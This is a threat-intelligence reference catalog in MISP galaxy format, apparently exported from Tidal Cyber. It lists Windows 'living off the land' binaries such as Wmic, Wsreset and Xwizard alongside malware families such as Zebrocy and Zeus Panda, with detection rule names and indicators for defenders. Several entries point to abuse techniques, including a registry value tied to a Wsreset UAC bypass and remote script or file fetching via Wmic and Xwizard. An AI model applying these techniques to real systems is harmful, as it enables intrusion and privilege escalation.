Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Linux', 'macOS', 'Windows'] |
| software_attack_id | S5269 |
| source | Tidal Cyber |
| tags | ['dbe18a6a-c8f9-451e-837e-5a7f25dcf913', 'ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207', 'cd1b5d44-226e-4405-8985-800492cf2865'] |
| type | ['tool'] |
Wlrmdr
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Windows Logon Reminder executable
Author: Moshe Kaplan
Paths: * c:\windows\system32\wlrmdr.exe
Resources: * https://twitter.com/0gtweet/status/1493963591745220608 * https://twitter.com/Oddvarmoe/status/927437787242090496 * https://twitter.com/falsneg/status/1461625526640992260 * https://docs.microsoft.com/en-us/windows/win32/api/shellapi/ns-shellapi-notifyicondataw
Detection: * Sigma: proc_creation_win_lolbin_wlrmdr.yml * IOC: wlrmdr.exe spawning any new processes[Wlrmdr.exe - LOLBAS Project]
Internal MISP references
UUID f3eb99a8-b7b5-4e90-8e99-3f38309402c0 which can be used as unique global reference for Wlrmdr in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5175 |
| source | Tidal Cyber |
| tags | ['ebf92004-6e43-434c-8380-3671cf3640a2', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
Wmic
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: The WMI command-line (WMIC) utility provides a command-line interface for WMI
Author: Oddvar Moe
Paths: * C:\Windows\System32\wbem\wmic.exe * C:\Windows\SysWOW64\wbem\wmic.exe
Resources: * https://stackoverflow.com/questions/24658745/wmic-how-to-use-process-call-create-with-a-specific-working-directory * https://subt0x11.blogspot.no/2018/04/wmicexe-whitelisting-bypass-hacking.html * https://twitter.com/subTee/status/986234811944648707
Detection: * Sigma: image_load_wmic_remote_xsl_scripting_dlls.yml * Sigma: proc_creation_win_wmic_xsl_script_processing.yml * Sigma: proc_creation_win_wmic_squiblytwo_bypass.yml * Sigma: proc_creation_win_wmic_eventconsumer_creation.yml * Elastic: defense_evasion_suspicious_wmi_script.toml * Elastic: persistence_via_windows_management_instrumentation_event_subscription.toml * Elastic: defense_evasion_suspicious_managedcode_host_process.toml * Splunk: xsl_script_execution_with_wmic.yml * Splunk: remote_wmi_command_attempt.yml * Splunk: remote_process_instantiation_via_wmi.yml * Splunk: process_execution_via_wmi.yml * BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules * IOC: Wmic retrieving scripts from remote system/Internet location * IOC: DotNet CLR libraries loaded into wmic.exe * IOC: DotNet CLR Usage Log - wmic.exe.log[LOLBAS Wmic]
Internal MISP references
UUID 24f3b066-a533-4b6c-a590-313a67154ba0 which can be used as unique global reference for Wmic in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5176 |
| source | Tidal Cyber |
| tags | ['d819ae1a-e385-49fd-88d5-f66660729ecb', 'e551ae97-d1b4-484e-9267-89f33829ec2c', 'e1af18e3-3224-4e4c-9d0f-533768474508', '758c3085-2f79-40a8-ab95-f8a684737927', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '904ad11a-20ca-479c-ad72-74bd5d9dc7e4', '35e694ec-5133-46e3-b7e1-5831867c3b55', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '15787198-6c8b-4f79-bf50-258d55072fee', '9988b5fd-6235-4a8e-bb8e-d9124ead11d4', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
Related clusters
To see the related clusters, click here.
Woody RAT
Woody RAT is a remote access trojan (RAT) that has been used since at least August 2021 against Russian organizations.[MalwareBytes WoodyRAT Aug 2022]
Internal MISP references
UUID 1f374a54-c839-5139-b755-555c66a21c12 which can be used as unique global reference for Woody RAT in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S1065 |
| source | MITRE |
| type | ['malware'] |
WorkFolders
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Work Folders
Author: Elliot Killick
Paths: * C:\Windows\System32\WorkFolders.exe
Resources: * https://www.ctus.io/2021/04/12/exploading/ * https://twitter.com/ElliotKillick/status/1449812843772227588
Detection: * Sigma: proc_creation_win_susp_workfolders.yml * IOC: WorkFolders.exe should not be run on a normal workstation[WorkFolders.exe - LOLBAS Project]
Internal MISP references
UUID 7720f60a-5c03-4241-b635-6313eceb3307 which can be used as unique global reference for WorkFolders in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5177 |
| source | Tidal Cyber |
| tags | ['b5581207-a45f-4f7f-b637-14444d716ad1', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
Wscript
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Used by Windows to execute scripts
Author: Oddvar Moe
Paths: * C:\Windows\System32\wscript.exe * C:\Windows\SysWOW64\wscript.exe
Resources: * https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
Detection: * Sigma: proc_creation_win_wscript_cscript_script_exec.yml * Sigma: file_event_win_net_cli_artefact.yml * Sigma: image_load_susp_script_dotnet_clr_dll_load.yml * Elastic: defense_evasion_unusual_dir_ads.toml * Elastic: command_and_control_remote_file_copy_scripts.toml * Elastic: defense_evasion_suspicious_managedcode_host_process.toml * Splunk: wscript_or_cscript_suspicious_child_process.yml * BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules * IOC: Wscript.exe executing code from alternate data streams * IOC: DotNet CLR libraries loaded into wscript.exe * IOC: DotNet CLR Usage Log - wscript.exe.log[Wscript.exe - LOLBAS Project]
Internal MISP references
UUID be8d1032-3452-4d44-83cb-c7ece7d5a052 which can be used as unique global reference for Wscript in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5178 |
| source | Tidal Cyber |
| tags | ['b4520b56-73e3-43fd-9f0d-70191132b451', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
Related clusters
To see the related clusters, click here.
Wsl
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Windows subsystem for Linux executable
Author: Matthew Brown
Paths: * C:\Windows\System32\wsl.exe
Resources: * https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules * https://twitter.com/nas_bench/status/1535431474429808642
Detection: * Sigma: proc_creation_win_wsl_lolbin_execution.yml * BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules * IOC: Child process from wsl.exe[Wsl.exe - LOLBAS Project]
Internal MISP references
UUID 9663965e-0fd1-45c3-a138-c7539ed91832 which can be used as unique global reference for Wsl in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5251 |
| source | Tidal Cyber |
| tags | ['96ebb518-7c1f-4011-a3ec-42aa78a95e4f', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
Wsreset
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Used to reset Windows Store settings according to its manifest file
Author: Oddvar Moe
Paths: * C:\Windows\System32\wsreset.exe
Resources: * https://www.activecyber.us/activelabs/windows-uac-bypass * https://twitter.com/ihack4falafel/status/1106644790114947073 * https://github.com/hfiref0x/UACME/blob/master/README.md
Detection: * Sigma: proc_creation_win_uac_bypass_wsreset_integrity_level.yml * Sigma: proc_creation_win_uac_bypass_wsreset.yml * Sigma: registry_event_bypass_via_wsreset.yml# * Splunk: wsreset_uac_bypass.yml * IOC: wsreset.exe launching child process other than mmc.exe * IOC: Creation or modification of the registry value HKCU\Software\Classes\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\Shell\open\command * IOC: Microsoft Defender Antivirus as Behavior:Win32/UACBypassExp.T!gen[Wsreset.exe - LOLBAS Project]
Internal MISP references
UUID b75e4dcf-62ed-44cc-b9d2-d6d1b90955a8 which can be used as unique global reference for Wsreset in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5179 |
| source | Tidal Cyber |
| tags | ['291fab5d-e732-4b19-83e4-ee642b2ae0f0', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
wt
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Windows Terminal
Author: Nasreddine Bencherchali
Paths:
* C:\Program Files\WindowsApps\Microsoft.WindowsTerminal_
Resources: * https://twitter.com/nas_bench/status/1552100271668469761
Detection: * Sigma: proc_creation_win_windows_terminal_susp_children.yml[wt.exe - LOLBAS Project]
Internal MISP references
UUID a34b303e-e8bb-48b2-85e0-f6e2620d68ab which can be used as unique global reference for wt in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5184 |
| source | Tidal Cyber |
| tags | ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
wuauclt
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Windows Update Client
Author: David Middlehurst
Paths: * C:\Windows\System32\wuauclt.exe
Resources: * https://dtm.uk/wuauclt/
Detection: * Sigma: net_connection_win_wuauclt_network_connection.yml * Sigma: proc_creation_win_lolbin_wuauclt.yml * Sigma: proc_creation_win_wuauclt_execution.yml * IOC: wuauclt run with a parameter of a DLL path * IOC: Suspicious wuauclt Internet/network connections[wuauclt.exe - LOLBAS Project]
Internal MISP references
UUID 06fe608d-a517-492f-8557-cfb820984146 which can be used as unique global reference for wuauclt in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5180 |
| source | Tidal Cyber |
| tags | ['03f0e493-63ae-47b5-8353-238390a895a8', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
Related clusters
To see the related clusters, click here.
XAgentOSX
XAgentOSX is a trojan that has been used by APT28 on OS X and appears to be a port of their standard CHOPSTICK or XAgent trojan. [XAgentOSX 2017]
Internal MISP references
UUID 6f411b69-6643-4cc7-9cbd-e15d9219e99c which can be used as unique global reference for XAgentOSX in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['macOS'] |
| software_attack_id | S0161 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Xbash
Xbash is a malware family that has targeted Linux and Microsoft Windows servers. The malware has been tied to the Iron Group, a threat actor group known for previous ransomware attacks. Xbash was developed in Python and then converted into a self-contained Linux ELF executable by using PyInstaller.[Unit42 Xbash Sept 2018]
Internal MISP references
UUID ab442140-0761-4227-bd9e-151da5d0a04f which can be used as unique global reference for Xbash in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Linux', 'Windows'] |
| software_attack_id | S0341 |
| source | MITRE |
| type | ['malware'] |
xCaon
xCaon is an HTTP variant of the BoxCaon malware family that has used by IndigoZebra since at least 2014. xCaon has been used to target political entities in Central Asia, including Kyrgyzstan and Uzbekistan.[Checkpoint IndigoZebra July 2021][Securelist APT Trends Q2 2017]
Internal MISP references
UUID 11a0dff4-1dc8-4553-8a38-90a07b01bfcd which can be used as unique global reference for xCaon in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0653 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
xCmd
xCmd is an open source tool that is similar to PsExec and allows the user to execute applications on remote systems. [xCmd]
Internal MISP references
UUID d943d3d9-3a99-464f-94f0-95aa7963d858 which can be used as unique global reference for xCmd in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| software_attack_id | S0123 |
| source | MITRE |
| type | ['tool'] |
Related clusters
To see the related clusters, click here.
xcopy
xcopy is a Windows tool used to copy files and directories, including subdirectories, with a variety of options. According to Microsoft, the xcopy command "creates files with the archive attribute set, whether or not this attribute was set in the source file".[xcopy Microsoft]
Internal MISP references
UUID 84954209-1e2a-48dd-ba17-0f015f6de3ef which can be used as unique global reference for xcopy in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5019 |
| source | Tidal Cyber |
| tags | ['758c3085-2f79-40a8-ab95-f8a684737927', 'af5e9be5-b86e-47af-91dd-966a5e34a186', '35e694ec-5133-46e3-b7e1-5831867c3b55', '1dc8fd1e-0737-405a-98a1-111dd557f1b5', '15787198-6c8b-4f79-bf50-258d55072fee', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
Related clusters
To see the related clusters, click here.
XCSSET
XCSSET is a macOS modular backdoor that targets Xcode application developers. XCSSET was first observed in August 2020 and has been used to install a backdoor component, modify browser applications, conduct collection, and provide ransomware-like encryption capabilities.[trendmicro xcsset xcode project 2020]
Internal MISP references
UUID 3672ecfa-20bf-4d69-948d-876be343563f which can be used as unique global reference for XCSSET in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['macOS'] |
| software_attack_id | S0658 |
| source | MITRE |
| tags | ['4a457eb3-e404-47e5-b349-8b1f743dc657', '5e7433ad-a894-4489-93bc-41e90da90019', '7e7b0c67-bb85-4996-a289-da0e792d7172'] |
| type | ['malware'] |
XMRig
XMRig is an open-source tool that uses the resources of the running system to mine Monero cryptocurrency. According to U.S. cybersecurity authorities, "XMRig can cause a victim computer to overheat and perform poorly by using additional system resources that would otherwise not be active".[U.S. CISA Trends June 30 2020]
Internal MISP references
UUID 1491c020-6449-48e7-8ebf-abf7b71fbc97 which can be used as unique global reference for XMRig in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5064 |
| source | Tidal Cyber |
| tags | ['ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', '15787198-6c8b-4f79-bf50-258d55072fee', '291c006e-f77a-4c9c-ae7e-084974c0e1eb', '4fa6f8e1-b0d5-4169-8038-33e355c08bde', 'efa33611-88a5-40ba-9bc4-3d85c6c8819b', '8d95e4d6-9a1e-4920-9f5c-83d9fe07a66e'] |
| type | ['tool'] |
Related clusters
To see the related clusters, click here.
Xpack
According to joint Cybersecurity Advisory AA23-250A (September 2023), Xpack is a malicious, "custom .NET loader that decrypts (AES), loads, and executes accompanying files".[U.S. CISA Zoho Exploits September 7 2023]
Internal MISP references
UUID 19e7e967-7d0a-4930-8ef9-11a43dcb081d which can be used as unique global reference for Xpack in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5048 |
| source | Tidal Cyber |
| tags | ['15787198-6c8b-4f79-bf50-258d55072fee', '84615fe0-c2a5-4e07-8957-78ebc29b4635'] |
| type | ['malware'] |
XTunnel
XTunnel a VPN-like network proxy tool that can relay traffic between a C2 server and a victim. It was first seen in May 2013 and reportedly used by APT28 during the compromise of the Democratic National Committee. [Crowdstrike DNC June 2016] [Invincea XTunnel] [ESET Sednit Part 2]
Internal MISP references
UUID 133136f0-7254-4cec-8710-0ab99d5da4e5 which can be used as unique global reference for XTunnel in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0117 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Xwizard
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Execute custom class that has been added to the registry or download a file with Xwizard.exe
Author: Oddvar Moe
Paths: * C:\Windows\System32\xwizard.exe * C:\Windows\SysWOW64\xwizard.exe
Resources: * http://www.hexacorn.com/blog/2017/07/31/the-wizard-of-x-oppa-plugx-style/ * https://www.youtube.com/watch?v=LwDHX7DVHWU * https://gist.github.com/NickTyrer/0598b60112eaafe6d07789f7964290d5 * https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/ * https://twitter.com/notwhickey/status/1306023056847110144
Detection: * Sigma: proc_creation_win_lolbin_class_exec_xwizard.yml * Sigma: proc_creation_win_lolbin_dll_sideload_xwizard.yml * Elastic: execution_com_object_xwizard.toml * Elastic: defense_evasion_unusual_process_network_connection.toml[Xwizard.exe - LOLBAS Project]
Internal MISP references
UUID d5663ff2-904b-42d6-b4d8-672017d91de2 which can be used as unique global reference for Xwizard in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5181 |
| source | Tidal Cyber |
| tags | ['c37d2f5f-91da-43c6-869e-192bf0e0ae90', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
YAHOYAH
YAHOYAH is a Trojan used by Tropic Trooper as a second-stage backdoor.[TrendMicro TropicTrooper 2015]
Internal MISP references
UUID 0844bc42-5c29-47c3-b1b3-6bfffbf1732a which can be used as unique global reference for YAHOYAH in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0388 |
| source | MITRE |
| tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
yty
yty is a modular, plugin-based malware framework. The components of the framework are written in a variety of programming languages. [ASERT Donot March 2018]
Internal MISP references
UUID e0962ff7-5524-4683-9b95-0e4ba07dccb2 which can be used as unique global reference for yty in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0248 |
| source | MITRE |
| tags | ['16b47583-1c54-431f-9f09-759df7b5ddb7'] |
| type | ['malware'] |
Zebrocy
Zebrocy is a Trojan that has been used by APT28 since at least November 2015. The malware comes in several programming language variants, including C++, Delphi, AutoIt, C#, VB.NET, and Golang. [Palo Alto Sofacy 06-2018][Unit42 Cannon Nov 2018][Unit42 Sofacy Dec 2018][CISA Zebrocy Oct 2020]
Internal MISP references
UUID e317b8a6-1722-4017-be33-717a5a93ef1c which can be used as unique global reference for Zebrocy in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0251 |
| source | MITRE |
| tags | ['febea5b6-2ea2-402b-8bec-f3f5b3f73c59'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Zeroaccess
Zeroaccess is a kernel-mode Rootkit that attempts to add victims to the ZeroAccess botnet, often for monetary gain. [Sophos ZeroAccess]
Internal MISP references
UUID 2f52b513-5293-4833-9c4d-b120e7a84341 which can be used as unique global reference for Zeroaccess in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| software_attack_id | S0027 |
| source | MITRE |
| type | ['malware'] |
ZeroT
ZeroT is a Trojan used by TA459, often in conjunction with PlugX. [Proofpoint TA459 April 2017] [Proofpoint ZeroT Feb 2017]
Internal MISP references
UUID f51df90e-ea1b-4eeb-9aff-ec5abf4a5dfd which can be used as unique global reference for ZeroT in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0230 |
| source | MITRE |
| tags | ['84615fe0-c2a5-4e07-8957-78ebc29b4635'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
Zeus Panda
Zeus Panda is a Trojan designed to steal banking information and other sensitive credentials for exfiltration. Zeus Panda’s original source code was leaked in 2011, allowing threat actors to use its source code as a basis for new malware variants. It is mainly used to target Windows operating systems ranging from Windows XP through Windows 10.[Talos Zeus Panda Nov 2017][GDATA Zeus Panda June 2017]
Internal MISP references
UUID be8add13-40d7-495e-91eb-258d3a4711bc which can be used as unique global reference for Zeus Panda in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0330 |
| source | MITRE |
| tags | ['4d767e87-4cf6-438a-927a-43d2d0beaab7'] |
| type | ['malware'] |
Zipfldr
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Compressed Folder library
Author: LOLBAS Team
Paths: * c:\windows\system32\zipfldr.dll * c:\windows\syswow64\zipfldr.dll
Resources: * https://twitter.com/moriarty_meng/status/977848311603380224 * https://twitter.com/bohops/status/997896811904929792 * https://windows10dll.nirsoft.net/zipfldr_dll.html
Detection: * Sigma: proc_creation_win_rundll32_susp_activity.yml[Zipfldr.dll - LOLBAS Project]
Internal MISP references
UUID 34d0c5b5-f6e1-41e9-9061-cf9d36fe61c8 which can be used as unique global reference for Zipfldr in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| owner | TidalCyberIan |
| platforms | ['Windows'] |
| software_attack_id | S5201 |
| source | Tidal Cyber |
| tags | ['0d0098b4-e159-4502-973d-714011ba605f', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
| type | ['tool'] |
ZLib
ZLib is a full-featured backdoor that was used as a second-stage implant during Operation Dust Storm since at least 2014. ZLib is malware and should not be confused with the legitimate compression library from which its name is derived.[Cylance Dust Storm]
Internal MISP references
UUID 1ac8d363-2903-43da-9c1d-2b28179638c8 which can be used as unique global reference for ZLib in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0086 |
| source | MITRE |
| type | ['malware'] |
Zox
Zox is a remote access tool that has been used by Axiom since at least 2008.[Novetta-Axiom]
Internal MISP references
UUID 75dd9acb-fcff-4b0b-b45b-f943fb589d78 which can be used as unique global reference for Zox in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0672 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
zwShell
zwShell is a remote access tool (RAT) written in Delphi that has been seen in the wild since the spring of 2010 and used by threat actors during Night Dragon.[McAfee Night Dragon]
Internal MISP references
UUID 49314d4e-dc04-456f-918e-a3bedfc3192a which can be used as unique global reference for zwShell in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0350 |
| source | MITRE |
| tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
| type | ['malware'] |
ZxShell
ZxShell is a remote administration tool and backdoor that can be downloaded from the Internet, particularly from Chinese hacker websites. It has been used since at least 2004.[FireEye APT41 Aug 2019][Talos ZxShell Oct 2014]
Internal MISP references
UUID eea89ff2-036d-4fa6-bbed-f89502c62318 which can be used as unique global reference for ZxShell in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S0412 |
| source | MITRE |
| tags | ['febea5b6-2ea2-402b-8bec-f3f5b3f73c59'] |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.
ZxxZ
ZxxZ is a trojan written in Visual C++ that has been used by BITTER since at least August 2021, including against Bangladeshi government personnel.[Cisco Talos Bitter Bangladesh May 2022]
Internal MISP references
UUID 91e1ee26-d6ae-4203-a466-93c9e5019b47 which can be used as unique global reference for ZxxZ in MISP communities and other software using the MISP galaxy
Associated metadata
| Metadata key | Value |
|---|---|
| platforms | ['Windows'] |
| software_attack_id | S1013 |
| source | MITRE |
| type | ['malware'] |
Related clusters
To see the related clusters, click here.